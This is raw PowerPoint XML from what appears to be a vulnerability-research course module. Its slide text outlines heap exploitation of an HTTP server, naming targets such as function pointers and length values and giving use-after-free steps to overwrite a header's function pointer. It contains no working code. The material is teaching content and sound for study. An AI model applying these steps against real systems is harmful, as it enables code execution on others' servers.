            <a:ext cx="2248795" cy="372857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="461137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152" y="2"/>
            <a:ext cx="9159153" cy="2097741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623888" y="1282307"/>
            <a:ext cx="7886700" cy="2139553"/>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2099"/>
            <a:ext cx="7886700" cy="112514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5/5/22</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6301" y="4640206"/>
            <a:ext cx="2248795" cy="372857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2417412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152" y="2"/>
            <a:ext cx="9159153" cy="209774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5/5/22</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6301" y="4640206"/>
            <a:ext cx="2248795" cy="372857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3275607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5556837" y="1561380"/>
            <a:ext cx="5148543" cy="2025795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11"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561375" y="1556335"/>
            <a:ext cx="5148547" cy="2025795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="273847"/>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1878809"/>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6"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6" y="1878809"/>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5/5/22</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80666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111375" y="1561380"/>
            <a:ext cx="5148547" cy="202579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5/5/22</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8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-15153" y="0"/>
            <a:ext cx="465152" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="177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Calibri"/>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6301" y="4640206"/>
            <a:ext cx="2248795" cy="372857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339758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5400000">
            <a:off x="-584422" y="584424"/>
            <a:ext cx="5146483" cy="3977639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>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5/5/22</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31026" y="4225741"/>
            <a:ext cx="4174064" cy="692072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3702135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740572"/>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5/5/22</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543759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740572"/>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5/5/22</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630856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EAEBB18-575C-491D-9A03-4A868AFBFB67}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr defTabSz="914400"/>
              <a:t>5/5/22</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D6946070-18CF-4637-832E-0142B797C654}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr defTabSz="914400"/>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822807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177CC0"/>
          </a:solidFill>
          <a:latin typeface="Avenir Medium"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Avenir Medium"/>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png"/></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emojipedia.org/fir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customXml" Target="../ink/ink5.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml"/><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40.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink14.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.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customXml" Target="../ink/ink13.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.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9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6F0-09EE-204A-A362-8F838768369E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623888" y="1282307"/>
            <a:ext cx="8209394" cy="2139553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Final Module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B215E06C-29C1-ED42-9BB8-0049186C22F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Entering the world of vulnerability research</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2923208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https://developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC803A79-423D-0D42-9FE2-D4EBF6AAF259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548751" y="0"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reponses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="https://developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B41523-2552-6449-BBBE-8BE96609F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311" y="690830"/>
            <a:ext cx="7279689" cy="4744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338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83CEB-5926-C54E-A050-EF0377230BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good Targets in HTTP Server?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD656466-3200-344C-828F-098F4D1B8A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important Data: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function Pointers (any pointers really) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Length values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Ids</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sizing – even size extendable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All controllable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D0550EB-40AE-4C45-B2F1-B598EB56C232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458310" y="3693965"/>
            <a:ext cx="3886200" cy="6068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Check in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>server.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0">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38242821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83CEB-5926-C54E-A050-EF0377230BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My Favorite Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1635F8E5-36DD-E94E-ABED-F4A7DBF22D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="69742" y="1731202"/>
            <a:ext cx="4445108" cy="2255891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD656466-3200-344C-828F-098F4D1B8A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important Data: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Function Pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Length values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Sizing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>All controllable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0DE87F-8BFD-9945-A21D-085EACFCCDD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487062" y="3615303"/>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281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1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8" y="1236541"/>
            <a:ext cx="8399849" cy="562130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Goal: overwrite function pointer of header</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5" name="Picture 4" descr="Chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{194DBD77-26D9-8641-908C-2E960DB60C43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1031348"/>
            <a:ext cx="4361804" cy="4005738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21828169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2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8" y="1236541"/>
            <a:ext cx="8399849" cy="562130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Free the header to trigger UAF</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7" name="Picture 6" descr="Header is free - in the TCache">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C23C957-81DE-F54B-82F2-D578ED1DCA56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1532659"/>
            <a:ext cx="6710766" cy="3050348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2748973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3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0"/>
            <a:ext cx="4695756" cy="1151512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Allocate same chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Two pointers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> the same memory </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9" name="Picture 8" descr="Chart, bar chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F330EFE4-D847-C74B-BAB0-A0AB5F2519B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3245000" y="1268019"/>
            <a:ext cx="5727770" cy="3325801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="Chart, bar chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EE6FE7-050D-2546-B7B9-95A62B981831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="63594" t="49807" r="5966" b="25415"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865747" y="3625860"/>
            <a:ext cx="1743560" cy="824052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Use after free diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9BC8CB-5B02-1A46-ABD5-D58B5BDCC2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="70721" y="2388052"/>
            <a:ext cx="3463685" cy="1731843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2101391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4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39"/>
            <a:ext cx="3370649" cy="1770131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Other object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>writes its data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Corrupts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> along the way</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9" name="Picture 8" descr="Chart, bar chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F330EFE4-D847-C74B-BAB0-A0AB5F2519B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
